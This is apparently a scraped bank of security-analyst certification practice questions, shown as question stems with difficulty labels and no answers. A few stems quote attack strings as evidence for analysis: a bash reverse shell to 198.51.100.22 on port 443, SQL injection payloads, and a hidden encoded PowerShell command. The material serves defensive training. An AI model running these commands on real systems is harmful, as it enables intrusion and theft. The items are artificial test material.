A SOC analyst is reviewing Cisco Firepower intrusion event logs and notices a signature that fired with the message 'OS-COMMAND' on traffic destined to an internal web server on TCP port 80. Which type of activity does this signature most likely indicate?

Easy
576

A SOC analyst is monitoring network traffic using Cisco Stealthwatch. An alert is generated indicating a large volume of data being transferred from a critical server to an external IP address during off-hours. The analyst observes that the data transfer is using encrypted HTTPS traffic to a cloud storage provider. The server is known to host sensitive customer data. The analyst reviews the server's outbound firewall rules and finds that HTTPS traffic to any destination is allowed. The analyst checks the server's recent login logs and sees an authentication from a user account that is typically used by a contractor who only works during business hours. The contractor's account has not been disabled after the contract ended last week. What should the analyst do first?

Medium
577

A network analyst is troubleshooting a false positive alert from an IPS that blocks traffic to a legitimate database server. The alert signature is triggered by the pattern 'OR 1=1'. The analyst determines that the traffic is from a web application that uses dynamic SQL queries. Which action best reduces false positives while maintaining security?

Medium
578

During incident response, an analyst is collecting volatile evidence from a compromised Linux server that is still running. The team wants to preserve the current state of active network connections and running processes before any remediation. Which action best preserves this volatile data in a forensically sound manner?

Hard
579

A security analyst is investigating a potential data breach. The analyst identifies that the attacker used a technique to impersonate a legitimate user by spoofing the MAC address and IP address. Which TWO types of network attacks could involve these techniques? (Choose two.)

Medium
580

In a Linux system, an analyst wants to check for unauthorized cron jobs. Which of the following is a common location for user-specific cron jobs?

Medium
581

An organization uses STIX and TAXII to share threat intelligence with an ISAC. What is the purpose of TAXII in this scenario?

Medium
582

A security analyst is evaluating risks and calculates that a threat has a likelihood of 0.5 and an impact of $200,000. What is the risk value?

Hard
583

An analyst finds an unknown scheduled task on a Windows system that runs a PowerShell script at system startup. Which tool is best for examining the task's trigger and actions?

Medium
584

An analyst is examining a PCAP of what appears to be a covert channel. The analyst observes that the internal host sends ICMP Echo Requests that contain a payload of exactly 48 bytes of non-repeating binary data, and the corresponding Echo Replies always return with a zero-length payload. The payload bytes, when decoded, contain what looks like command strings. Which technique is most consistent with these observations?

Hard
585

An analyst uses 'tshark -r capture.pcap -Y "http.request.method == POST"' to display only HTTP POST requests. This is an example of a:

Hard
586

Refer to the exhibit. What does this packet capture indicate?

Hard
587

In a PCAP, an analyst sees a large outbound data transfer over FTP to an external IP address during non-business hours. The source host is a database server. Which phase of the Cyber Kill Chain does this represent?

Medium
588

Drag and drop the steps to configure a Cisco ASA firewall for basic network access into the correct order.

Medium
589

A security analyst is investigating a recent security breach. The analyst discovers that an attacker gained access to the network by exploiting a vulnerability in an unpatched web server. After gaining access, the attacker moved laterally to other systems and exfiltrated sensitive data. The organization wants to improve its security posture to prevent similar incidents. Which security concept best describes the attacker's actions after initial compromise?

Medium
590

Which TWO of the following are essential components of an effective security policy framework according to Cisco best practices?

Medium
591

A security analyst is investigating an incident where an attacker gained initial access to a corporate network. The analyst finds that the attacker sent a phishing email with a link to a malicious website that exploited a vulnerability in the user's browser. Which phase of the Cyber Kill Chain does the browser exploitation represent?

Medium
592

A network analyst finds a PCAP with a series of DNS queries for subdomains like "data12345.example.com" and "data67890.example.com" where the subdomain names appear to contain encoded base64 data. This pattern suggests:

Hard
593

An analyst receives an alert for 'ET WEB_SERVER Possible SQL Injection Attempt' triggered by a URL parameter containing ' OR 1=1--'. After investigating, the analyst confirms that the web application is not vulnerable to SQL injection and the request was a benign test. How should this alert be classified?

Easy
594

Which security concept describes the potential for a threat to exploit a vulnerability, and is often expressed as a combination of likelihood and impact?

Easy
595

A security analyst is reviewing a packet capture from the DMZ and sees a host at 203.0.113.45 sending a flood of TCP segments with the SYN flag set to many different destination ports on a single internal web server, all within a few seconds. The source IP never completes the three-way handshake. Which type of attack is this host most likely performing?

Medium
596

Which OSI layer is targeted by a TCP SYN flood attack?

Easy
597

A security analyst is investigating a potential data breach. They need to preserve evidence for legal proceedings. Which action should the analyst take to ensure the integrity of the data?

Medium
598

A security analyst is reviewing logs to identify a potential brute force attack. Which TWO log entries would be most suspicious? (Choose TWO.)

Medium
599

A security analyst is investigating a potential data exfiltration incident. The analyst notices that a large amount of data has been sent to an external IP address over port 443 during non-business hours. The company uses a proxy server that logs all outbound connections. Which action should the analyst take first to validate the suspicion?

Medium
600

An analyst is investigating a PCAP file and wants to reconstruct a conversation between two hosts. Which Wireshark filter would be most appropriate to follow the entire TCP stream?

Medium
601

A security analyst is reviewing the organization's security policy framework. The analyst notes that the policy defines the acceptable use of company assets, including computers, networks, and data. Which document typically outlines the rules for employee behavior when using these assets?

Easy
602

Refer to the exhibit. An analyst runs tasklist /SVC on a suspected host. Which process is most suspicious?

Easy
603

An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?

Hard
604

An analyst is triaging a Windows 10 host and finds a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' that runs a PowerShell script from C:\Users\Public\update.ps1 every 30 minutes. The script base64-decodes a payload and calls Invoke-WebRequest to a remote host. Which action should the analyst take FIRST to preserve evidence while containing the threat?

Hard
605

Which type of attack does this Snort alert most likely indicate?

Hard
606

A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?

Medium
607

A security administrator is configuring a firewall rule set to control traffic between the corporate network and the internet. The policy states that only web browsing (HTTP and HTTPS) should be allowed outbound, and all other outbound traffic should be denied. Which type of security control is this an example of?

Easy
608

In a PCAP, an analyst sees an interactive shell session over TCP with irregular command prompts and responses. Which tool was likely used to generate this traffic?

Hard
609

Which TWO of the following are best practices when configuring a SIEM correlation rule to detect lateral movement?

Hard
610

A mid-sized financial firm has a segmented network with a DMZ hosting a web server, an internal network with a database server, and an employee LAN. The security infrastructure includes a next-generation firewall (NGFW) with IPS, an endpoint detection and response (EDR) solution, and a SIEM. Over the past week, the SIEM has generated alerts for unusual outbound connections from the database server to an external IP address 198.51.100.33 on TCP port 443 during non-business hours. The EDR shows no malware on the database server, but a process named 'sqlsrv.exe' (the legitimate SQL Server process) is making these connections. The server's file integrity monitoring indicates that the sqlsrv.exe file has not been modified, but a memory dump reveals injected code that appears to be a reverse shell. The firewall logs show that the outbound connections are allowed because they match an existing rule permitting the database server to reach external update servers. The IP 198.51.100.33 is not on any threat intelligence feed as malicious, but it is geolocated to a country with known cybercrime activity. Which action should the security analyst take FIRST?

Hard
611

An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?

Hard
612

A Windows system's security log shows Event ID 4720 followed by 4726 for the same username within minutes. What does this sequence indicate?

Medium
613

During a PCAP analysis, a security analyst notices an HTTP request with the URI parameter 'id=1 UNION SELECT username,password FROM users--'. What is the most likely attack being attempted?

Hard
614

In the MITRE ATT&CK framework, TTPs are mapped to:

Easy
615

A company's data classification policy defines "Confidential" data. Which of the following is an example of Confidential data?

Easy
616

A security engineer reviews syslog data and sees multiple authentication failures from a single source IP to different SSH servers. The source IP is internal. What does this indicate?

Medium
617

A hospital's security team is updating its data handling policy. The compliance officer asks which two classification labels are most appropriate for a patient's electronic protected health information (ePHI) under a typical data classification scheme aligned with HIPAA expectations. (Choose two.)

Hard
618

During which phase of the NIST SP 800-61 Rev 2 incident response process should an organization develop and exercise the incident response plan?

Easy
619

Which protocol and port combination is used by SNMP for receiving traps?

Easy
620

An organization is implementing monitoring for encrypted traffic without decrypting it. Which approach would be most effective for detecting malicious activity?

Hard
621

Which Windows Event ID is recorded when a user account is created, indicating potential unauthorized account creation?

Easy
622

Which THREE of the following are best practices for creating and maintaining security policies? (Choose three.)

Medium
623

An organization's security policy specifies that all configuration changes must be approved through a change management process. An analyst discovers that a firewall rule was added without approval. What is the appropriate action?

Easy
624

A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?

Medium
625

Which TWO of the following are typically included in a security policy's scope statement?

Medium
626

A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?

Medium
627

An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?

Easy
628

In a risk management process, after identifying risks, the next step is to determine the potential impact and likelihood. This is known as:

Hard
629

Which THREE actions are mandatory in the evidence handling process according to standard forensic procedures?

Hard
630

During an intrusion analysis, an analyst identifies that an attacker used a domain generation algorithm (DGA) to resolve C2 domains. Which of the following traffic patterns is most consistent with DGA?

Medium
631

During an incident, an analyst finds a workstation that is beaconing to an external IP every 60 seconds using DNS TXT queries. The queries contain long, base64-encoded subdomains. The endpoint has no other suspicious network connections. Which technique is most likely being used?

Hard
632

A security analyst is reviewing a series of failed login attempts on a critical server. The logs show that the source IP addresses are from multiple geographic regions and the usernames tried are all valid employees. The attempts occur every 5 minutes for the past hour. According to the company's security policy, which type of attack is most likely occurring, and what is the best immediate response?

Hard
633

Drag and drop the steps for the TCP three-way handshake into the correct order.

Medium
634

A security analyst is reviewing the organization's incident response plan and notices that it does not specify how to handle a situation where a zero-day vulnerability is exploited before a patch is available. The analyst wants to recommend a proactive measure that aligns with the NIST SP 800-61 revision 2 and the CyberOps Associate curriculum. Which of the following should the analyst recommend?

Medium
635

An analyst observes a large outbound FTP transfer to an external IP address from a server that normally does not generate such traffic. This is most likely an indicator of:

Hard
636

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

Medium
637

An analyst is investigating a Linux system for persistence mechanisms. Which TWO of the following are common locations for cron-based persistence? (Select TWO)

Easy
638

A security manager is drafting a service level agreement (SLA) with a cloud service provider. The SLA must specify the maximum acceptable time for the provider to restore service after a disruption. Which metric should the manager include in the SLA to define this requirement?

Hard
639

An organization needs to ensure that a document has not been altered and to verify the sender's identity. Which combination of cryptographic techniques should be used?

Hard
640

A company has implemented a role-based access control (RBAC) policy for its network devices. A network engineer needs temporary access to configure a router in a different region. According to the RBAC policy, what is the appropriate procedure?

Medium
641

Which three data sources are commonly used in a SIEM for threat hunting? (Choose three.)

Medium
642

A security analyst is monitoring network traffic and notices a sudden increase in outbound connections from a single workstation to multiple IP addresses on port 443 at regular intervals. The workstation is used for standard office applications. Which action should the analyst take first?

Easy
643

A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?

Medium
644

A security analyst analyzes an IDS alert that triggered on the string '/etc/passwd'. What type of signature is this?

Easy
645

Which TWO are components of the NIST SP 800-61 Rev 2 Preparation phase? (Select two.)

Medium
646

A Windows Event Log analysis reveals Event ID 4720 and 4726 occurrences for the same account within a short time. Which TWO actions were performed? (Select 2)

Medium
647

A security analyst is reviewing a Windows workstation that is suspected of being infected with malware that establishes persistence. The analyst wants to check a location that is commonly used by malware to automatically start when a user logs on. Which of the following should the analyst examine?

Easy
648

During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?

Hard
649

A network intrusion detection system (NIDS) generates an alert for a known exploit against a web server. The analyst verifies that the server is patched. What is the next best step?

Medium
650

A company wants to ensure that only authorized employees can enter the server room. Which type of control is a badge reader at the door?

Easy
651

An analyst is reviewing Snort alerts and notices repeated 'ET SCAN Potential SSH Scan' alerts from the same source IP. Which action should the analyst take next?

Medium
652

A company uses Cisco Firepower NGFW with intrusion prevention. The security team notices that some legitimate traffic is being blocked by the IPS, causing application outages. The analyst reviews the IPS signature events and finds false positives. What is the best approach to handle this without reducing security posture?

Medium
653

A security analyst is reviewing a vulnerability scan report and sees a finding labeled 'CVE-2021-44228' with a CVSS score of 10.0. The analyst needs to prioritize remediation. Which factor does the CVSS score primarily represent?

Medium
654

An analyst suspects data exfiltration via DNS. Which log type would provide the most relevant information to confirm this?

Medium
655

A company uses Cisco Stealthwatch to monitor network traffic. Which type of data does Stealthwatch primarily rely on for visibility?

Easy
656

An analyst is reviewing Sysmon logs from a compromised host. They see Event ID 1 (Process creation) for cmd.exe with parent process winword.exe. What does this indicate?

Hard
657

An analyst sees an alert for 'SQL injection' but the target is an internal application that only accepts POST requests with JSON data. The alert was triggered by a parameter in the URL. What is the most likely issue?

Hard
658

Based on the exhibit, what is the most likely type of attack being observed?

Hard
659

An analyst wants to determine if a specific executable has been run on a Windows system. Which artifact provides evidence of prior execution?

Easy
660

A company's security policy requires that all data classified as 'Confidential' must be encrypted at rest and in transit. This requirement is part of which policy?

Medium
661

During a security assessment, an analyst uses the Shodan search engine to find exposed industrial control systems. Which phase of the attack lifecycle does this activity represent?

Hard
662

A SOC analyst is investigating a suspected data exfiltration. The analyst needs to preserve evidence from a compromised workstation. Which of the following is the CORRECT procedure to ensure evidence integrity?

Medium
663

A security analyst is reviewing the cryptographic mechanisms used to protect data in transit and at rest. The organization wants to ensure confidentiality and integrity for sensitive files stored on a server and for data sent over a VPN. Which TWO of the following mechanisms provide both confidentiality and integrity for data? (Choose two.)

Medium
664

An incident response plan includes steps to contain a ransomware outbreak. Which TWO actions are typically performed during the containment phase? (Select two.)

Medium
665

A security analyst is reviewing a Windows 10 host for potential compromise. The analyst runs 'net user' and sees an account named 'Support' that was not created by IT. The account is a member of the local Administrators group. Which Windows Event ID should the analyst check to determine when this account was created?

Medium
666

During a SYN scan, an attacker sends a SYN packet to a closed port on a target. What response does the target typically send back?

Medium
667

A SOC analyst is reviewing NetFlow records and notices that a single internal host has initiated connections to 1,024 distinct destination IP addresses on TCP port 445 within a five-minute window. Each connection attempt lasts under one second and transfers fewer than three packets. Which activity does this pattern most strongly indicate?

Medium
668

A hospital's IT department issues a document that tells administrators the exact sequence of steps to disable a terminated clinician's account, including which systems to check and in what order. The document is mandatory and is referenced during audits. Which type of security documentation does this describe?

Medium
669

Which TWO of the following are examples of Indicators of Compromise (IoCs) used in network security monitoring? (Choose two.)

Easy
670

Which two actions should an analyst take when a security monitoring tool generates a high number of false positives for a specific signature? (Choose two.)

Hard
671

Which TWO actions are appropriate when analyzing network traffic to identify a potential data exfiltration attempt?

Medium
672

An analyst needs to check for services that were set to start automatically on a Windows host. Which command-line utility can be used to query the state and start type of all services?

Easy
673

An analyst examining a Linux server notices an unusual cron job in /etc/crontab that runs a script every 5 minutes. Which of the following describes the best approach to determine if this cron job is malicious?

Hard
674

A network analyst is creating a baseline for normal network traffic. Which TWO metrics should be included to establish a baseline?

Easy
675

An analyst is performing memory forensics on a Windows machine using Volatility. Which command would be most useful to identify hidden or injected code within a process?

Medium
676

A financial services firm must retain security event logs for seven years to satisfy regulatory requirements. The SOC manager asks which property of log data must be preserved so that logs cannot be altered or deleted after collection, even by administrators. Which property should the manager emphasize?

Medium
677

An incident handler collects a hard drive from a compromised server. To maintain chain of custody, which information must be documented?

Medium
678

In the Cyber Kill Chain model, which phase involves delivering the exploit to the target, such as via email attachment or malicious link?

Easy
679

An analyst filters PCAP with 'tcp.stream eq 0' and sees an interactive shell session with commands like 'whoami', 'ls -la', 'cd /etc'. The session originated from an HTTP POST to a web shell. Which type of attack is this?

Medium
680

A security analyst receives an alert that an employee's workstation is generating outbound traffic to a known malware command-and-control IP address at 3:00 AM. According to the company's incident response policy, what is the FIRST action the analyst should take?

Easy
681

An analyst receives a YARA rule that includes the string 'MZ' at the beginning of a file. What does this indicator typically help identify?

Hard
682

An analyst is reviewing network traffic and observes a series of DNS queries for long, random-looking subdomains of a single domain, followed by large TXT record responses. The queries occur at regular intervals and the volume is unusually high. Which type of attack is most likely indicated?

Hard
683

A security analyst is reviewing firewall logs and notices that a workstation is making outbound connections to multiple external IP addresses on port 22 (SSH). The workstation is not authorized to use SSH for external connections. Which type of activity does this most likely indicate?

Easy
684

A security manager is drafting a data classification policy and wants to ensure handling requirements are applied consistently. Which TWO elements should the policy define for each classification level? (Choose two.)

Hard
685

An attacker sends an email that appears to come from the company's IT department, asking the recipient to click a link and reset their password due to a security breach. Which type of social engineering is this?

Medium
686

An analyst is monitoring network traffic and sees a sudden spike in outbound data transfer from an internal server to an external IP that is known to be malicious. What is the most likely scenario?

Easy
687

A security analyst is reviewing Sysmon telemetry from a workstation that may be compromised. Which TWO event types should the analyst correlate first to identify suspicious process execution and persistence? (Choose two.)

Medium
688

A Cisco ASA firewall is configured to send syslog messages to a SIEM. Which logging level includes 'informational' messages?

Easy
689

A company is deploying a new web application and wants to ensure it is secure against common web attacks. Which of the following is the most effective approach to validate the security of the application before going live?

Medium
690

Match each security tool to its primary purpose.

Medium
691

A forensic analyst is examining a suspicious file. The file has a high entropy score (close to 8.0) and the PE section names are obfuscated. Which tool or technique would best help determine if the file is packed?

Hard
692

An organization is conducting a risk assessment and assigns a monetary value to potential losses. Which risk assessment method is being used?

Medium
693

An analyst is reviewing a network intrusion alert and sees a large number of ICMP echo requests sent from a single external IP to multiple internal hosts. The ICMP payloads are identical and the requests are sent in rapid succession. Which type of activity does this most likely represent?

Easy
694

An intrusion detection system alerts on traffic that appears to be a command and control (C2) beacon. Which of the following characteristics is most typical of beaconing traffic?

Easy
695

An IDS detected the following signature match: "ET TROJAN Zeus variant outbound connection to C2 server". The destination IP is flagged as a known malicious host. What should the analyst do FIRST?

Medium
696

Which TWO host-based analysis techniques are most effective for detecting fileless malware?

Easy
697

An analyst reviews Cisco ASA syslog messages and sees repeated entries with message ID 106023 denied inbound TCP from an external address to an internal web server on port 443. The web server is expected to receive inbound HTTPS traffic. What should the analyst investigate?

Medium
698

A security analyst is evaluating the risk of a new web application that will store customer credit card data. The analyst needs to determine the likelihood and impact of a data breach. Which risk analysis approach involves assigning numerical values to assets, threats, and vulnerabilities to calculate an annualized loss expectancy (ALE)?

Medium
699

An organization uses a SIEM that ingests logs from multiple sources. The analysts are overwhelmed with alerts, many of which are false positives. Which strategy best reduces alert fatigue without increasing risk?

Hard
700

Which element of the CIA triad is primarily concerned with preventing unauthorized access to data?

Easy
701

Which THREE of the following are common elements of an incident response policy?

Hard
702

An organization is implementing a new security control that will verify the integrity of critical system files by comparing their current hash values against known good baseline values. Which security concept does this control primarily address?

Easy
703

A security analyst is investigating a Windows workstation that experienced a series of failed logon attempts followed by a successful logon. Which TWO Windows Event IDs should the analyst examine to understand this activity?

Medium
704

An analyst is monitoring network traffic and observes a host making outbound HTTPS connections to a domain that appears to be generated by a Domain Generation Algorithm (DGA). Which phase of the Cyber Kill Chain best describes this activity?

Medium
705

An analyst is analyzing a suspicious executable file. Using the 'file' command, it returns 'data' instead of 'PE32 executable'. What is the most likely reason?

Medium
706

A security analyst is examining a suspicious file and wants to determine its reputation and threat score. Which Cisco security solution should the analyst use to query the file's SHA-256 hash and get a verdict?

Easy
707

Based on the exhibit, which traffic is permitted?

Medium
708

Drag and drop the steps to implement a disaster recovery plan for a critical server into the correct order.

Medium
709

Which TWO are goals of a security operations center (SOC)? (Choose two.)

Easy
710

A security analyst is reviewing the organization's incident response plan and wants to ensure it aligns with the NIST incident response lifecycle. Which two phases are part of the NIST incident response lifecycle? (Choose two.)

Medium
711

Drag and drop the steps to perform a password recovery on a Cisco IOS router into the correct order.

Medium
712

A company's security policy requires that all system logs be retained for at least one year. A security analyst discovers that log files are being overwritten after 30 days. What is the most likely cause?

Easy
713

An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?

Hard
714

An analyst examines a PCAP and finds a series of UDP packets sent to multiple ports on a target. The target responds with ICMP 'Destination Unreachable (Port Unreachable)' messages for each port. What type of scan is being performed?

Hard
715

Which TWO of the following are characteristics of an advanced persistent threat (APT)?

Easy
716

Which type of attack is indicated by a series of SMB authentication attempts from one host to multiple other hosts in a short time frame?

Medium
717

A security analyst receives an alert from the SIEM indicating a large number of failed login attempts from an external IP address targeting a user account. According to the incident response process, what should be the analyst's first action?

Medium
718

In the NIST SP 800-61 Rev 2 incident response process, which phase involves documenting lessons learned and updating the incident response plan?

Easy
719

A SOC Tier 2 analyst receives an escalated alert about a potential command-and-control (C2) communication. The analyst needs to correlate network logs with threat intelligence. Which data format and transport protocol pair is specifically designed for standardized threat intelligence sharing?

Hard
720

Which phase of the NIST Cybersecurity Framework involves actions to limit the impact of a cybersecurity incident?

Easy
721

Match each cybersecurity framework/standard to its focus.

Medium
722

A SOC analyst reviewing Cisco Firepower intrusion events notices that a single internal host generated hundreds of alerts for the same signature within a five-minute window, each with a different destination port on the same external IP. The analyst wants to reduce noise before escalating. Which action should the analyst take first?

Medium
723

An analyst discovers a suspicious service on a Windows host. Which command can be used to query the status and details of services from the command line?

Easy
724

An analyst detects a large outbound FTP transfer from a sensitive server to an external IP address not previously seen. The file being transferred is a compressed archive containing database dumps. Which Cyber Kill Chain phase is most directly indicated?

Hard
725

Which TWO components are essential in a well-written security policy?

Easy
726

An analyst is investigating a Linux server and suspects that an attacker has established persistence by modifying system startup scripts. The analyst runs 'ls -la /etc/rc.local' and finds it has been modified recently. Which TWO additional artifacts should the analyst examine to identify other potential persistence mechanisms? (Choose two.)

Hard
727

A security team is designing a defense-in-depth strategy. They want to add a control that inspects the actual content of network traffic for known attack signatures and can block or alert on malicious payloads in real time. Which technology best meets this requirement?

Easy
728

A SOC analyst examines an alert generated by an IDS. The alert indicates a potential SQL injection attempt. However, the analyst finds that the source IP is a known internal web server that performs legitimate database queries. What is the most likely explanation?

Hard
729

A SOC analyst is investigating a Windows workstation that has been exhibiting unusual outbound connections. Reviewing Sysmon Event ID 3 (Network Connection) logs, the analyst notices a process named svchost.exe with a parent process of cmd.exe initiating connections to an external IP on port 4444. On a healthy system, svchost.exe is normally spawned by services.exe. Which conclusion is most strongly supported by these log entries?

Hard
730

An analyst is investigating a suspected TCP session hijacking attempt. The analyst reviews a PCAP and sees duplicate packets with the same sequence numbers but different source IP addresses. Which two TCP characteristics would most likely be manipulated in such an attack? (Choose two.)

Medium
731

An analyst is reviewing logs on a Windows 10 host that is suspected of being compromised. The analyst runs 'wevtutil qe Security /q:"*[System[(EventID=4688)]]" /f:text' and sees that a process named 'powershell.exe' was launched by 'winword.exe' with the command line 'powershell -nop -w hidden -enc SQBFAFgA...'. Which type of malicious activity does this most likely indicate?

Medium
732

A security manager is updating the organization's data classification policy. The policy must align with the CyberOps Associate curriculum and ensure that data handling procedures are consistent. The manager proposes that data classified as 'Public' should still be encrypted when stored on internal servers. Which principle should guide the manager's decision?

Hard
733

A security analyst is analyzing a memory dump from a compromised Linux server. Which tool is most appropriate for extracting running processes and network connections from the dump?

Easy
734

A security analyst is examining a Windows 10 endpoint suspected of compromise. The analyst runs `wmic process get name,processid,executablepath,parentprocessid` and observes a process named `lsass.exe` with PID 1234 and executable path `C:\Windows\Temp\lsass.exe`. The legitimate lsass.exe should reside in `C:\Windows\System32`. Which of the following is the MOST likely explanation?

Hard
735

An organization wants to ensure the integrity of software updates downloaded from its vendor's website. The vendor provides a hash value for each update. Which TWO properties of hashing algorithms make them suitable for integrity verification? (Choose two.)

Medium
736

A business impact analysis (BIA) for a critical enterprise application reveals a maximum tolerable downtime (MTD) of 4 hours and a recovery time objective (RTO) of 2 hours. The current backup solution can restore the application in 3 hours under optimal conditions. Which of the following is the most appropriate action from a policy perspective?

Hard
737

A security policy requires that all remote access be through a VPN using strong authentication. A user calls the help desk saying they cannot connect to the VPN. The analyst checks and sees that the user's token is not synchronized. What should the analyst do?

Easy
738

A company uses Cisco Firepower NGFW with intrusion prevention. An analyst notices that many legitimate HTTPS connections are being blocked by an IPS rule. What is the best approach to reduce false positives?

Hard
739

An analyst is investigating a host that is making outbound HTTPS connections to multiple random-looking domains, each with a short TTL. The domains are not in any threat intelligence feeds. Which technique is most likely being used?

Hard
740

A security analyst is investigating a potential data exfiltration incident. Which TWO of the following network behaviors are indicators of data exfiltration?

Medium
741

During network intrusion analysis, an analyst reviews a PCAP showing a series of TCP packets where the attacker sends an ACK with a sequence number outside the expected window, followed by packets with overlapping sequence ranges. The analyst suspects the attacker is attempting to evade an IDS by confusing its TCP stream reassembly. Which evasion technique is being used?

Easy
742

A security analyst is examining a log file and notices that the hash value of a configuration file does not match the expected value. Which security goal has been violated?

Medium
743

Which TWO types of network traffic should be analyzed to detect a data exfiltration attempt via HTTP? (Choose two.)

Easy
744

A security analyst is identifying potential vulnerabilities in the network. Which TWO of the following are examples of passive reconnaissance?

Easy
745

A security analyst notices that a workstation is generating multiple DNS queries to a known malicious domain. Which host-based analysis technique would be most effective in confirming the infection?

Easy
746

An analyst needs to determine if a host is infected with malware that is attempting to contact a known malicious domain. Which log source is most appropriate for this analysis?

Easy
747

An IPS sensor is configured inline and drops traffic that triggers the signature 'OVERFLOW-ICMP-ECHO', which triggers on ICMP packets with size > 1024 bytes. A network administrator reports that legitimate network monitoring tools using large ICMP packets are being blocked. What is the best course of action?

Hard
748

An analyst is reviewing a PCAP of an intrusion and observes that the attacker's machine sent a TCP segment with the ACK flag set to a target host, but the target had never received a SYN from the attacker. The target responded with an RST. The analyst wants to determine what the attacker was attempting. Which technique best describes this activity?

Hard
749

An organization uses a qualitative risk assessment to evaluate a new vendor. Which characteristic is typical of qualitative risk assessments?

Hard
750

An analyst reviews a PCAP and sees a host receive an unsolicited ICMP echo reply containing an embedded payload, followed by the host initiating a TCP connection to an internal server on port 445. The ICMP payload begins with bytes that decode to a URL path. Which analysis conclusion is most defensible?

Hard
751

Refer to the exhibit. An analyst sees repeated denied TCP connections from the same source to the same destination web server. Which of the following actions should the analyst take first?

Hard
752

A security policy mandates that all employees complete annual security awareness training. Which of the following metrics best demonstrates the effectiveness of this training?

Easy
753

A company implements a policy requiring all employees to use a hardware token for remote access. This is an example of which type of security control?

Medium
754

A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?

Medium
755

Which TWO of the following are symmetric encryption algorithms? (Choose two.)

Easy
756

Which log type would an analyst examine to view details about HTTP methods (GET, POST), response codes, and user-agent strings?

Easy
757

Drag and drop the steps to analyze a packet capture for suspicious activity into the correct order.

Medium
758

During a host-based analysis, a Windows system is found to have a suspicious service that starts automatically. Which command-line tool can be used to query the status and configuration of services, particularly to identify non-standard service names or paths?

Medium
759

Which Windows registry hive is most likely to contain evidence of malware persistence via a service?

Easy
760

A security analyst discovers that a server's configuration allows users to access files outside of their intended directory. In security terminology, what is this weakness called?

Medium
761

Refer to the exhibit. A network analyst sees these firewall logs. What is the most likely interpretation?

Medium
762

A security monitoring tool generates an alert for a user accessing a sensitive file at an unusual hour. What is the most appropriate next step?

Easy
763

MedSecure is a healthcare organization with a security policy that requires all security incidents to be handled following the NIST framework. A system administrator discovers that an unauthorized user has accessed a database containing patient records. The administrator immediately disconnects the server from the network. The security analyst is called to investigate. The analyst finds that the server was not part of the centralized logging system, and the only logs available are the database audit logs. The security policy mandates preservation of evidence and chain of custody. The analyst needs to collect the database audit logs. Which action should the analyst take to ensure proper evidence collection?

Hard
764

A network analyst is investigating a suspected DNS tunneling attack. Which THREE of the following are indicators of DNS tunneling?

Medium
765

An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)

Hard
766

A hospital's security team discovers that a network device is silently forwarding copies of all traffic to an internal host that no administrator recognizes. The device is a managed switch that connects the radiology VLAN to the core. Which attack has most likely been implemented against this switch?

Medium
767

A company operating in the EU experiences a data breach involving personal data of EU citizens. Under GDPR, what is the maximum timeframe to notify the supervisory authority?

Hard
768

An analyst is examining a firewall log entry: '2023-10-25 14:30:00 ACTION=DENY SRC=10.0.0.5 DST=203.0.113.50 PROTO=TCP SPT=445 DPT=445'. Which statement best describes this event?

Medium
769

Which of the following is an example of a symmetric encryption algorithm?

Medium
770

During which phase of the NIST SP 800-61 Rev 2 incident response process does an organization develop an incident response plan and assemble a team?

Easy
771

Which TWO are common indicators of a compromised host? (Choose two.)

Medium
772

A SOC analyst is reviewing a Windows 10 endpoint that is suspected of being compromised by malware that hides its network connections. The analyst runs 'netstat -anob' on the live system but does not see any suspicious outbound connections. Which Windows artifact should the analyst examine next to identify network connections that may have been hidden from the live API?

Medium
773

Drag and drop the steps to configure SSH access on a Cisco IOS switch into the correct order.

Medium
774

An organization's security policy requires that all traffic between the corporate network and the internet be inspected by an IPS. However, encrypted traffic (HTTPS) cannot be inspected without breaking encryption. Which solution best meets the policy requirement?

Hard
775

During a host-based investigation, an analyst finds a process named 'svchost.exe' consuming high CPU. The process path is 'C:\Windows\Temp\svchost.exe'. What should the analyst conclude?

Medium
776

Refer to the exhibit. A host-based analyst reviews auth.log. What does the accepted password log entry indicate?

Medium
777

A security analyst is reviewing Windows Event Logs to determine if a user account was recently created on a compromised host. Which Windows Event ID should the analyst look for in the Security log to identify user account creation events?

Easy
778

A financial services firm must comply with regulations covering cardholder data. The security team is mapping its controls to the PCI DSS framework and wants to confirm that the framework's requirements are being met before an upcoming assessment. Which statement best describes what PCI DSS provides to the organization?

Medium
779

A security analyst is examining a PCAP and observes a series of TCP packets with the PSH flag set and small payload sizes, sent from an internal host to an external IP. The packets are spaced roughly 30 seconds apart. Which type of malicious activity is MOST likely indicated?

Medium
780

